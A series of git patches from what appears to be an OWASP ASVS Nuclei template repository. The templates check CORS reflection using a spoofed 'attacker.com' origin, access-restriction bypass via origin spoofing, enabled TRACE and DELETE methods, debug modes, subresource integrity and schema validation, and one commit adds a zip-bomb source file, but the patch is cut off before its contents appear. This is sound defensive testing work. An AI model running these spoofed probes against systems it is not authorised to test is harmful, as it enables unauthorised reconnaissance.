403 + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Origin: {{origin_schema}}{{origin_host}}{{origin_port}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: */* + + cookie-reuse: true + payloads: + origin_host: + - 127.0.0.1 + - localhost + - '{{resolve("{{FQDN}}")}}' + origin_schema: + - http:// + - https:// + origin_port: + - + - :80 + - :443 + attack: clusterbomb + + stop-at-first-match: true + matchers: + - type: dsl + name: 'Access Restriction Bypass Via Origin Spoof' + dsl: + - status_code < 210 && status_code >= 200 + - to_number(forbidden_status_code) != status_code From e5c8223e658e00abec315eddf20bda8f7c4d4704 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 6 Oct 2023 19:40:51 +0330 Subject: [PATCH 056/129] Create 14.5.3.yaml Signed-off-by: Hamed Salimian --- templates/14.5.3.yaml | 50 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 templates/14.5.3.yaml diff --git a/templates/14.5.3.yaml b/templates/14.5.3.yaml new file mode 100644 index 0000000..1d48bd1 --- /dev/null +++ b/templates/14.5.3.yaml @@ -0,0 +1,50 @@ +id: ASVS-4-0-3-V14-5-3 + +info: + name: ASVS 14.5.3 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-346 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing + - https://snbig.github.io/Vulnerable-Pages/ASVS_14_5_3/ + tags: asvs,14.5.3 + description: | + Verify that the Cross-Origin Resource Sharing (CORS) Access-Control-Allow-Origin header uses a strict allow list of trusted domains and subdomains to match against and does not support the "null" origin. + +http: + - method: DELETE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Access-Control-Request-Method: DELETE + Origin: https://attacker.com + Referer: https://attacker.com/ + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 + Accept: "*/*" + + extractors: + - type: kval + part: header + name: "Access-Control-Allow-Origin header" + kval: + - Access_Control_Allow_Origin + + matchers: + - type: word + name: "Wildcard directive in Access-Control-Allow-Origin" + part: access_control_allow_origin + words: + - "*" + - type: word + name: "Access-Control-Allow-Origin reflects Origin header" + part: access_control_allow_origin + words: + - "attacker.com" + - type: word + name: "Access-Control-Allow-Origin is null" + part: access_control_allow_origin + words: + - "null" From a9d0830505f19d75a67c4db8bcf40ff09448621c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 14 Oct 2023 11:53:51 +0330 Subject: [PATCH 057/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 1 - 1 file changed, 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index e1a150d..633a668 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -15,4 +15,3 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Reza Saeedi](https://github.com/Reza-saeedi) From 80646a645c371f9712d67c56cf680c00b92f60cb Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 14 Oct 2023 11:54:11 +0330 Subject: [PATCH 058/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index 091b4a0..3654252 100644 --- a/README.md +++ b/README.md @@ -23,5 +23,4 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Reza Saeedi](https://github.com/Reza-saeedi) From 000dbb1c1aba48fa1457943423f9aa1d21b6a29e Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 16 Oct 2023 18:24:21 +0330 Subject: [PATCH 059/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 113 ++++-------------------------------------- 1 file changed, 9 insertions(+), 104 deletions(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 9a99776..1f57bb9 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -21,33 +21,21 @@ http: Host: "{{Hostname}}" Cookie: "{{Cookie}}" extractors: - - type: regex - name: "potentially risky methods (OPTIONS check)" - part: header - regex: - - "(PUT|DELETE|TRACE|PATCH|CONNECT)" - type: kval - name: "Access-Control-Allow-Methods" part: header kval: - Access_Control_Allow_Methods + - type: kval + part: header + kval: + - Allow matchers: - type: regex + name: "potentially risky methods (OPTIONS check)" part: header regex: - - "(PUT|DELETE|TRACE|PATCH|CONNECT)" - - - raw: - - | - {{to_upper(rand_text_alpha(4))}} {{Path}} HTTP/1.1 - Host: {{Hostname}} - Cookie: {{Cookie}} - extractors: - - type: dsl - internal: true - name: rand_resp - dsl: - - status_code + - (?i)Access-Control-Allow-Methods:\s*.*\b(PUT|DELETE)\b + - (?i)Allow:\s*.*\b(PUT|DELETE)\b - method: PUT path: @@ -58,19 +46,15 @@ http: body: "HTTP PUT Method is Enabled" extractors: - type: dsl - name: "PUT method is Enabled" dsl: - status_code - matchers-condition: and matchers: - type: status + name: "PUT method is Enabled" negative: true status: - 405 - 501 - - type: dsl - dsl: - - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" - method: DELETE path: @@ -80,91 +64,12 @@ http: Cookie: "{{Cookie}}" extractors: - type: dsl - name: "DELETE method is Enabled" dsl: - status_code - matchers-condition: and - matchers: - - type: status - negative: true - status: - - 405 - - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - - - method: TRACE - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Cookie: "{{Cookie}}" - extractors: - - type: dsl - name: "TRACE method is Enabled" - dsl: - - status_code - matchers-condition: and - matchers: - - type: status - negative: true - status: - - 405 - - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - - type: regex - part: body - regex: - - '^TRACE \S+ HTTP\/[0-9]\.[0-9]' - - - method: PATCH - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Cookie: "{{Cookie}}" - body: "" - extractors: - - type: dsl - name: "PATCH method is Enabled" - dsl: - - status_code - matchers-condition: and - matchers: - - type: status - negative: true - status: - - 405 - - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - - - method: CONNECT - path: - - "{{BaseURL}}" - headers: - Host: "{{Hostname}}" - Cookie: "{{Cookie}}" - extractors: - - type: dsl - name: "CONNECT method is Enabled" - dsl: - - status_code - matchers-condition: and matchers: - type: status + name: "DELETE method is Enabled" negative: true status: - 405 - 501 - - type: dsl - negative: true - dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" From aadb20d82df2b9920c09525ed5ea43d60e937a2c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 16 Oct 2023 18:25:17 +0330 Subject: [PATCH 060/129] Create 14.5.1.yaml Signed-off-by: Hamed Salimian --- templates/14.5.1.yaml | 48 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 templates/14.5.1.yaml diff --git a/templates/14.5.1.yaml b/templates/14.5.1.yaml new file mode 100644 index 0000000..cc9f89d --- /dev/null +++ b/templates/14.5.1.yaml @@ -0,0 +1,48 @@ +id: ASVS-4-0-3-V14-5-1 + +info: + name: ASVS 14.5.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-749 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods.html + tags: asvs,14.5.1 + description: | + Verify that the application server only accepts the HTTP methods in use by the application/API, including pre-flight OPTIONS, and logs/alerts on any requests that are not valid for the application context. + +http: + - method: TRACE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + extractors: + - type: dsl + name: "TRACE method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: regex + part: body + regex: + - '^TRACE \S+ HTTP\/[0-9]\.[0-9]' + + - raw: + - | + {{to_upper(rand_text_alpha(4))}} {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + matchers: + - type: status + name: "CUSTOM method is allowed." + negative: true + status: + - 405 + - 501 From 76b28c46a7cf630c50c5e7d29e60222ee19349b7 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 17 Oct 2023 07:54:15 +0330 Subject: [PATCH 061/129] Update 14.5.1.yaml Signed-off-by: Hamed Salimian --- templates/14.5.1.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/14.5.1.yaml b/templates/14.5.1.yaml index cc9f89d..bdde8bd 100644 --- a/templates/14.5.1.yaml +++ b/templates/14.5.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V14-5-1 info: name: ASVS 14.5.1 Check author: Hamed Salimian - severity: medium + severity: low classification: cwe-id: CWE-749 reference: From 8d7fa6fe97819e09c0372dd19a521894b3404834 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 17 Oct 2023 05:31:37 +0000 Subject: [PATCH 062/129] Update 13.2.1 14.5.1 --- templates/13.2.1.yaml | 4 ++++ templates/14.5.1.yaml | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 1f57bb9..d996df8 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -55,6 +55,8 @@ http: status: - 405 - 501 + - 400 + - 404 - method: DELETE path: @@ -73,3 +75,5 @@ http: status: - 405 - 501 + - 400 + - 404 diff --git a/templates/14.5.1.yaml b/templates/14.5.1.yaml index bdde8bd..ddb9334 100644 --- a/templates/14.5.1.yaml +++ b/templates/14.5.1.yaml @@ -30,6 +30,8 @@ http: status: - 405 - 501 + - 404 + - 400 - type: regex part: body regex: @@ -46,3 +48,5 @@ http: status: - 405 - 501 + - 404 + - 400 From ed4f9ed8ed3b487ba5158392d48b8533dc9bf691 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 12 Nov 2023 06:08:10 +0000 Subject: [PATCH 063/129] Add 14.3.2 workflow --- templates/workflows/14.3.2.yaml | 40 +++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 templates/workflows/14.3.2.yaml diff --git a/templates/workflows/14.3.2.yaml b/templates/workflows/14.3.2.yaml new file mode 100644 index 0000000..ce7ab3e --- /dev/null +++ b/templates/workflows/14.3.2.yaml @@ -0,0 +1,40 @@ +id: ASVS-4-0-3-V14-3-2 + +info: + name: ASVS 14.3.2 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-497 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html + tags: asvs,14.3.2,debug + description: | + Verify that web or application server and application framework debug modes are disabled in production to eliminate debug features, developer consoles, and unintended security disclosures. + +workflows: + - template: misconfiguration/symfony-debug.yaml + - template: exposures/logs/rails-debug-mode.yaml + - template: misconfiguration/debug/bottle-debug.yaml + - template: misconfiguration/debug/ampache-debug.yaml + - template: misconfiguration/laravel-debug-enabled.yaml + - template: misconfiguration/laravel-debug-infoleak.yaml + - template: misconfiguration/laravel-debug-error.yaml + - template: misconfiguration/aspx-debug-mode.yaml + - template: exposures/logs/jboss-seam-debug-page.yaml + - template: misconfiguration/struts-ognl-console.yaml + - template: exposures/logs/struts-problem-report.yaml + - template: misconfiguration/sitecore-debug-page.yaml + - template: exposures/logs/django-debug-exposure.yaml + - template: misconfiguration/rekognition-image-validation.yaml + - template: misconfiguration/browserless-debugger.yaml + - template: exposures/logs/struts-debug-mode.yaml + - template: misconfiguration/django-debug-detect.yaml + - template: misconfiguration/airflow/airflow-debug.yaml + - template: misconfiguration/php-debugbar-exposure.yaml + - template: misconfiguration/wamp-xdebug-detect.yaml + - template: misconfiguration/typo3-debug-mode.yaml + - template: exposures/logs/pyramid-debug-toolbar.yaml + - template: misconfiguration/php-errors.yaml + - template: vulnerabilities/jenkins/jenkins-stack-trace.yaml + - template: technologies/werkzeug-debugger-detect.yaml \ No newline at end of file From 4731fcae213cbb3cf9e76fad4daa8e80cbb78c14 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 25 Nov 2023 07:20:55 +0000 Subject: [PATCH 064/129] Create 14.2.3.yaml --- templates/headless/14.2.3.yaml | 51 ++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 templates/headless/14.2.3.yaml diff --git a/templates/headless/14.2.3.yaml b/templates/headless/14.2.3.yaml new file mode 100644 index 0000000..c83b2d3 --- /dev/null +++ b/templates/headless/14.2.3.yaml @@ -0,0 +1,51 @@ +id: ASVS-4-0-3-V14-2-3 + +info: + name: ASVS 14.2.3 Check + author: Hamed Salimian + severity: low + classification: + cwe-id: CWE-829 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity + tags: asvs,14.2.3 + description: | + Verify that if application assets, such as JavaScript libraries, CSS or web fonts, are hosted externally on a Content Delivery Network (CDN) or external provider, Subresource Integrity (SRI) is used to validate the integrity of the asset. + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + + - action: waitload + + - action: script + name: assets_with_external_fqdn + args: + code: | + () => { + var currentLocation = document.location.host; + var xpathExpression = "//*[self::script or self::link]" + + "[not(contains(@src, '" + currentLocation + "') or contains(@href, '" + currentLocation + "'))" + + " and ((contains(@href,'//') or contains(@src,'//')) and not(contains(translate(@integrity,'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz'),'sha')))]"; + + var matchingNodes = document.evaluate(xpathExpression, document, null, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null); + + var matchingTagsAsString = []; + for (var i = 0; i < matchingNodes.snapshotLength; i++) { + var node = matchingNodes.snapshotItem(i); + matchingTagsAsString.push(new XMLSerializer().serializeToString(node)); + } + return matchingTagsAsString.join(''); + } + + extractors: + - type: kval + kval: + - assets_with_external_fqdn + + matchers: + - type: dsl + dsl: + - len(assets_with_external_fqdn) > 0 \ No newline at end of file From e59032a9ef809146307681dc2ed3e37e4fc5aa4c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 25 Nov 2023 07:50:46 +0000 Subject: [PATCH 065/129] Update Submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 507f941..fe1dced 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 507f941014b049f142efe02c3bda411c34b376e2 +Subproject commit fe1dced06e1e47a9985477251a8f02914d901031 From 5ed6cd14586204325781cc0ecb0adb7b0b1c047f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 25 Nov 2023 17:17:21 +0330 Subject: [PATCH 066/129] Update 14.2.3.yaml Signed-off-by: Hamed Salimian --- templates/headless/14.2.3.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates/headless/14.2.3.yaml b/templates/headless/14.2.3.yaml index c83b2d3..95bc987 100644 --- a/templates/headless/14.2.3.yaml +++ b/templates/headless/14.2.3.yaml @@ -37,15 +37,15 @@ headless: var node = matchingNodes.snapshotItem(i); matchingTagsAsString.push(new XMLSerializer().serializeToString(node)); } - return matchingTagsAsString.join(''); + return matchingTagsAsString.join('|'); } extractors: - - type: kval - kval: - - assets_with_external_fqdn + - type: dsl + dsl: + - trim(split(assets_with_external_fqdn, '|'), '[]') matchers: - type: dsl dsl: - - len(assets_with_external_fqdn) > 0 \ No newline at end of file + - len(trim(split(assets_with_external_fqdn, '|'), '[]')) > 0 From 4f2281d491b7616dda14aaa42fc353eb6b369c9a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:09:49 +0330 Subject: [PATCH 067/129] Create 13.3.1.yaml Signed-off-by: Hamed Salimian --- templates/13.3.1.yaml | 52 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 templates/13.3.1.yaml diff --git a/templates/13.3.1.yaml b/templates/13.3.1.yaml new file mode 100644 index 0000000..8969e5c --- /dev/null +++ b/templates/13.3.1.yaml @@ -0,0 +1,52 @@ +id: ASVS-4-0-3-V13-3-1 + +info: + name: ASVS 13.3.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-20 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_13_3_1/index.html + tags: asvs,13.3.1 + description: | + Verify that XSD schema validation takes place to ensure a properly formed XML document, followed by validation of each input field before any processing of that data takes place. + +variables: + valid_xml: JohnJohn.Doe@mail.com + invalid_xml: JohnJohn.Doe + +http: + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/xml" + body: "{{valid_xml}}" + + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/xml" + body: "{{invalid_xml}}" + + extractors: + - type: dsl + name: "Valid xml submission status code" + dsl: + - http_1_status_code + + - type: dsl + name: "Invalid xml submission status code" + dsl: + - http_2_status_code + + matchers: + - type: dsl + name: "XSD schema validation does not take place" + dsl: + - http_1_status_code == http_2_status_code From c5473f852f489cd3a480c5f80d1409685f80bc63 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:12:01 +0330 Subject: [PATCH 068/129] Update 13.3.1.yaml Signed-off-by: Hamed Salimian --- templates/13.3.1.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/13.3.1.yaml b/templates/13.3.1.yaml index 8969e5c..58463c4 100644 --- a/templates/13.3.1.yaml +++ b/templates/13.3.1.yaml @@ -25,7 +25,7 @@ http: Host: "{{Hostname}}" Content-type: "application/xml" body: "{{valid_xml}}" - + - method: POST path: - "{{BaseURL}}" @@ -39,7 +39,7 @@ http: name: "Valid xml submission status code" dsl: - http_1_status_code - + - type: dsl name: "Invalid xml submission status code" dsl: From 211407397be65ed653c0a6db3db3ccaf4455e468 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:16:53 +0330 Subject: [PATCH 069/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 2656ccd..b12b53f 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -11,7 +11,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 @@ -21,9 +21,10 @@ jobs: go-version: 1.20.x - name: nuclei install - run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest - name: Template Validation run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -w ./templates/workflows -allow-local-file-access From 6ddf44c8d5155778b6e2cf243234b36226db437c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:23:39 +0330 Subject: [PATCH 070/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index b12b53f..806221e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -18,7 +18,7 @@ jobs: - name: Set up Go uses: actions/setup-go@v4 with: - go-version: 1.20.x + go-version: 1.21.x - name: nuclei install run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest @@ -27,4 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./templates/workflows -allow-local-file-access + nuclei -duc -validate -w nuclei-templates/workflows -allow-local-file-access From 038c711e95bf2aeb6af65132d5830340c1150aef Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 11 Dec 2023 10:26:15 +0330 Subject: [PATCH 071/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 806221e..946c11b 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w nuclei-templates/workflows -allow-local-file-access + nuclei -duc -validate -w ./workflows -allow-local-file-access From 58f0e243533425764cb2e52d8f7dc093675274d1 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Dec 2023 08:35:55 +0330 Subject: [PATCH 072/129] Create 13.2.2.yaml Signed-off-by: Hamed Salimian --- templates/13.2.2.yaml | 51 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 templates/13.2.2.yaml diff --git a/templates/13.2.2.yaml b/templates/13.2.2.yaml new file mode 100644 index 0000000..f095523 --- /dev/null +++ b/templates/13.2.2.yaml @@ -0,0 +1,51 @@ +id: ASVS-4-0-3-V13-2-2 + +info: + name: ASVS 13.2.2 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-20 + reference: + - https://snbig.github.io/Vulnerable-Pages/ASVS_13_2_2/index.html + tags: asvs,13.2.2 + description: | + Verify that JSON schema validation is in place and verified before accepting input. + +variables: + valid_json: '{"name":"John Doe","age":20}' + invalid_json: '{"name":"John Doe","age":200}' + +http: + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/json" + body: "{{valid_json}}" + + - method: POST + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Content-type: "application/json" + body: "{{invalid_json}}" + + extractors: + - type: dsl + name: "Valid json submission status code" + dsl: + - http_1_status_code + + - type: dsl + name: "Invalid json submission status code" + dsl: + - http_2_status_code + + matchers: + - type: dsl + name: "JSON schema validation does not take place" + dsl: + - http_1_status_code == http_2_status_code From 01d7301930cad42eb173984ee0aee05741f2472b Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Dec 2023 08:38:55 +0330 Subject: [PATCH 073/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 946c11b..3caedc5 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,3 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -w ./workflows -allow-local-file-access From e8010a19e2a77ce370b58fd9ba53eff701b0f2b8 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 12 Dec 2023 05:16:48 +0000 Subject: [PATCH 074/129] Update submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index fe1dced..266f974 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit fe1dced06e1e47a9985477251a8f02914d901031 +Subproject commit 266f9741658e1da4ac76d42e5121f0721063070c From a703bb14e2ffcc67bd29a8778145252d7f657be7 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 9 Feb 2024 11:08:05 +0330 Subject: [PATCH 075/129] Fix reference of 9.1.3.yaml Signed-off-by: Hamed Salimian --- templates/9.1.3.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index fd5bf0e..325c9f2 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -5,7 +5,7 @@ info: author: righettod,forgedhallpass,RezaSaeedi severity: low reference: - - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security - https://wiki.mozilla.org/Security/Server_Side_TLS - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html - https://ssl-config.mozilla.org/#config=intermediate From 57485bde2b510602ab08ddbfddbbebe33e903c9d Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 11:58:17 +0330 Subject: [PATCH 076/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 3caedc5..4adac39 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,3 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows \ No newline at end of file From adb6278a0370e3861a0d1994b7635ac0fb02449a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 18 Aug 2023 12:06:34 +0330 Subject: [PATCH 077/129] Update template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 4adac39..213dda0 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -27,4 +27,4 @@ jobs: run: | cp -r ${{ github.workspace }}/templates /home/runner/nuclei-templates nuclei -duc -validate -allow-local-file-access - nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows \ No newline at end of file + nuclei -duc -validate -allow-local-file-access -w /home/runner/nuclei-templates/workflows From 700fe9f1a226c475e0d3757ef89e8b2228705738 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 20 Aug 2023 11:00:16 +0330 Subject: [PATCH 078/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index 633a668..f27869b 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -14,4 +14,4 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: -- [Hamed Salimain](https://github.com/Snbig) (Project Leader) +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) \ No newline at end of file From 56a9545e62c046310527b71b0b25208ab8e163c4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 4 Sep 2023 07:15:15 +0330 Subject: [PATCH 079/129] Update tab_contributing.md Signed-off-by: Hamed Salimian --- tab_contributing.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tab_contributing.md b/tab_contributing.md index f27869b..633a668 100644 --- a/tab_contributing.md +++ b/tab_contributing.md @@ -14,4 +14,4 @@ For detailed information and guidelines about contributing in "ASVS evaluation t ### Core Team The project current core team are: -- [Hamed Salimain](https://github.com/Snbig) (Project Leader) \ No newline at end of file +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) From fecf53fbbbdfd8fec30adb2bc93772e065ae299b Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 14 Oct 2023 11:52:48 +0330 Subject: [PATCH 080/129] Update README.md Signed-off-by: Hamed Salimian From 0dda23035aed7f8752bbfba6e489fa5e0009713f Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 23 Mar 2024 12:42:15 +0000 Subject: [PATCH 081/129] Create 12.1.1.(2).yaml --- templates/12.1.1.yaml | 64 +++ templates/code/12.1.1.2.yaml | 59 +++ templates/code/source/zipbomb.py | 768 +++++++++++++++++++++++++++++++ 3 files changed, 891 insertions(+) create mode 100644 templates/12.1.1.yaml create mode 100644 templates/code/12.1.1.2.yaml create mode 100644 templates/code/source/zipbomb.py diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml new file mode 100644 index 0000000..fc2fe45 --- /dev/null +++ b/templates/12.1.1.yaml @@ -0,0 +1,64 @@ +id: ASVS-4-0-3-V12-1-1 + +info: + name: ASVS 12.1.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the 